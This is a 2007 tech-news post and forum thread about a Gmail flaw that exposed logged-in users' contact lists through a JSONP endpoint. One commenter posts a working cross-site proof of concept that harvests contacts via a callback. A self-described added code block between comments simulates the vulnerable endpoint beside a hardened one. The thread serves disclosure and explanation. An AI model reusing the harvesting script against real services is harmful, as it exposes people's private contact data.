Monday, January 1st 2007

Gmail leaves your account open to spammers

A new flaw has been exposed in Google's Gmail service which could allow hackers to get hold of your contacts. When you log into your Gmail (Googlemail in some countries) account, Google will put your details into a JavaScript file. Because of this, if you browse other websites whilst logged into your account, any of them could potentially declare the function "google" and get hold of all of your contacts. The only two ways to make sure your privacy is protected are to disable JavaScript on all websites except those you trust, or to not browse other sites whilst logged into any Google service. Admittedly Gmail is still only a beta, but a fault like this could be quite serious.

Update: disabling JavaScript did not solve this problem; however, it appears that Google has now fixed the issue and your contacts list should be safe.
Source: Engadget

16 Comments on Gmail leaves your account open to spammers

#1
spectre440
Hopefully Google will do the right thing and plug that hole in their users' security.
#2
peach1971
Just use Firefox + Add-on NoScript.

Turn on Java to read your mails?
Lol, how far have we gone... :D

And here's another useful thing:
www.customizegoogle.com/

No more annoying ads! :D
#3
cdawall
where the hell are my stars
Wondered how my account got spammed.
#4
Atech
peach1971:
Turn on Java to read your mails?
Lol, how far have we gone... :D
This vulnerability has nothing to do with Java.
#5
pt
not a suicide-bomber
no spam for me :)
(i don't have java installed)
#6
peach1971
Nothing to do with Java?
Google will put your details into a JavaScript file. Because of this, if you browse other websites whilst logged into your account, any of them could potentially declare the function “google” and be able to get hold of all of your contacts.
Sorry, I don't get it, Atech.
#7
Jimmy 2004
Atech:
This vulnerability has nothing to do with Java.
Well, from what I read when posting this story it was a JS (JavaScript) file that causes this problem, and you disable Java to protect yourself so it must link to Java :confused:
#8
Atech
Jimmy 2004:
Well, from what I read when posting this story it was a JS (JavaScript) file that causes this problem, and you disable Java to protect yourself so it must link to Java :confused:
<script language="javascript">
  // Callback that the contacts endpoint invokes with the response object;
  // it walks response.Body.Contacts and shows every name and address.
  function getContacts(response) {
    var output = "";
    for (var x = 0; x < response.Body.Contacts.length; x++) {
      output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email + "> ";
    }
    alert(output);
  }
</script>

<script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts">
</script>
No calls to the Java API there.

Edit: Gah to having to escape characters within code tags ...
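The following is an added example; it is not code from the news post, from Engadget, from Google, or from any commenter in this thread. It models in plain JavaScript what the news post describes and what Atech's snippet above relies on: a contacts endpoint that authenticates by cookie alone and wraps the data in a caller-named callback, so a script tag on any site (which the browser sends the Gmail cookie with) receives the contact list. Beside it is one conventional hardening (a prefix that is not valid JavaScript, no caller-chosen callback, and a per-session token in a custom request header that a script tag cannot add). That fix is an assumption about a standard mitigation, not a description of what Google actually changed. Every name here (SESSIONS, sessionToken, the sid=abc123 cookie, the contacts) is constructed for the example, and there is no network: the browser is simulated by evaluating the response body with the hostile page's callback as the only name in scope.

```javascript
// Added example (not from the news post or any commenter): a plain-JS model
// of a JSONP contacts endpoint like the one Atech's snippet calls, next to
// a hardened version. Everything here is constructed; there is no network.

// Constructed session store: Gmail-style session cookie -> contact list.
const SESSIONS = {
  "sid=abc123": [
    { Name: "Alice Example", Email: "alice@example.invalid" },
    { Name: "Bob Example", Email: "bob@example.invalid" },
  ],
};
const NOT_LOGGED_IN = { Success: false, Errors: [] };
const PREFIX = ")]}'\n"; // deliberately not valid JavaScript

function sessionFor(req) {
  return SESSIONS[req.cookie] || null;
}

// Vulnerable handler: trusts the cookie alone and wraps the data in whatever
// function name the query string asks for. A <script src=...> tag on any
// site is sent with the user's cookie, and that site defines the callback.
function vulnerableContacts(req) {
  const contacts = sessionFor(req);
  const callback = req.query.callback || "google";
  const payload = contacts ? { Success: true, Body: { Contacts: contacts } } : NOT_LOGGED_IN;
  return { contentType: "text/javascript", body: `${callback}(${JSON.stringify(payload)})` };
}

// Constructed token scheme for the hardened handler. A real service derives an
// unguessable per-session value; the point is that only same-origin code can
// read it, so a foreign page cannot supply it.
function sessionToken(cookie) {
  return "tok-" + cookie;
}

// Hardened handler (assumed standard mitigation, not what Google shipped):
// no caller-chosen callback, a prefix that turns the body into a syntax
// error when included as a script, and a per-session token in a custom
// header, which a <script> tag has no way to set.
function hardenedContacts(req) {
  const contacts = sessionFor(req);
  const authorized = contacts && req.headers["x-auth-token"] === sessionToken(req.cookie);
  const payload = authorized ? { Success: true, Body: { Contacts: contacts } } : NOT_LOGGED_IN;
  return { contentType: "application/json", body: PREFIX + JSON.stringify(payload) };
}

// What a legitimate same-origin client does: it can read the raw response,
// so it strips the prefix and parses the JSON. A script tag cannot.
function legitimateSameOriginFetch(cookie) {
  const req = { cookie, query: {}, headers: { "x-auth-token": sessionToken(cookie) } };
  const res = hardenedContacts(req);
  if (!res.body.startsWith(PREFIX)) throw new Error("unexpected response");
  return JSON.parse(res.body.slice(PREFIX.length));
}

// Simulated hostile page: the browser attaches the victim's cookie to the
// <script> request, the page controls only the URL (query string) and the
// global function named there, and it cannot add request headers.
function crossSiteScriptInclude(handler, callbackName) {
  const req = { cookie: "sid=abc123", query: { callback: callbackName }, headers: {} };
  const res = handler(req);
  let captured = null;
  const scope = { [callbackName]: (data) => { captured = data; } };
  try {
    // Evaluate the response the way a <script> tag would, with the
    // page-defined callback as the only name in scope.
    new Function(...Object.keys(scope), res.body)(...Object.values(scope));
  } catch (e) {
    return { leaked: false, error: e.constructor.name };
  }
  return { leaked: captured !== null && captured.Success === true, data: captured };
}

// Stand-alone demonstration.
console.log("vulnerable:", crossSiteScriptInclude(vulnerableContacts, "getContacts"));
console.log("hardened:  ", crossSiteScriptInclude(hardenedContacts, "getContacts"));
console.log("same-origin:", legitimateSameOriginFetch("sid=abc123"));
```

Run it with node. The vulnerable handler hands the full contact list to the simulated foreign page, and with no cookie it answers exactly the shape Bull Dog reports further down (a "google" callback around Success: false); the hardened handler fails with a SyntaxError before any callback runs, while the same-origin client, which can read the raw bytes, strips the prefix and parses the JSON normally. The detection angle for a defender is the same distinction: authenticated data served with a script content type and a caller-chosen callback is the pattern to look for in an API review.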
#9
Jimmy 2004
Atech:
No calls to the Java API there.
Whatever the case is, log into your Gmail and click here to see a nice list of your contacts. I'm not sure how a hacker can get hold of this, but I expect it's true. The reason that it may no longer be using Java is because Google claim to have fixed the issue. I'm no expert on Java, I'm just informing people of what I find.

Edit: well I disabled JavaScript and that page still shows my contacts... but Gmail doesn't work. Probably need to clear my cookies etc.

Edit2: Disabling JavaScript does NOT seem to solve this problem, that link still shows my contacts after I have cleared all my internet data with Javascript disabled... and I can't even use the Gmail service!!!

Edit3: Couldn't the line
script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts"
be linked to this?
#10
WarEagleAU
Bird of Prey
Good thing I don't use Gmail, too hard to get one anywho.
#11
mout12
WarEagleAU:
Good thing I don't use Gmail, too hard to get one anywho.
No. Go to mail.google.com, click 'SIGN UP', then enter your mobile phone number, and they'll send you a password via text message to your phone number. You'll have an account.
#12
Namslas90
Just proves that you can't rely on anyone to secure your PC, but yourself!
#13
cdawall
where the hell are my stars
WarEagleAU:
Good thing I don't use Gmail, too hard to get one anywho.
What's your email? I have some signups left.
#14
pt
not a suicide-bomber
I have 99, anyone want one? :)
#15
Bull Dog
Jimmy 2004:
Whatever the case is, log into your Gmail and click here to see a nice list of your contacts. I'm not sure how a hacker can get hold of this, but I expect it's true. The reason that it may no longer be using Java is because Google claim to have fixed the issue. I'm no expert on Java, I'm just informing people of what I find.
...snip.
That link doesn't work for me... meaning that when I am logged into my Gmail acct, and when I click on the link all I get is this:
google ({
Success: false,
Errors: []
})

Using Firefox.
#16
Jimmy 2004
Bull Dog:
That link doesn't work for me... meaning that when I am logged into my Gmail acct, and when I click on the link all I get is this:
google ({
Success: false,
Errors: []
})

Using Firefox.
Me too, I think they must've fixed it. I've updated the newspost again.

When I clicked that link earlier it would bring up a list in which you could find any info about your contacts you had saved.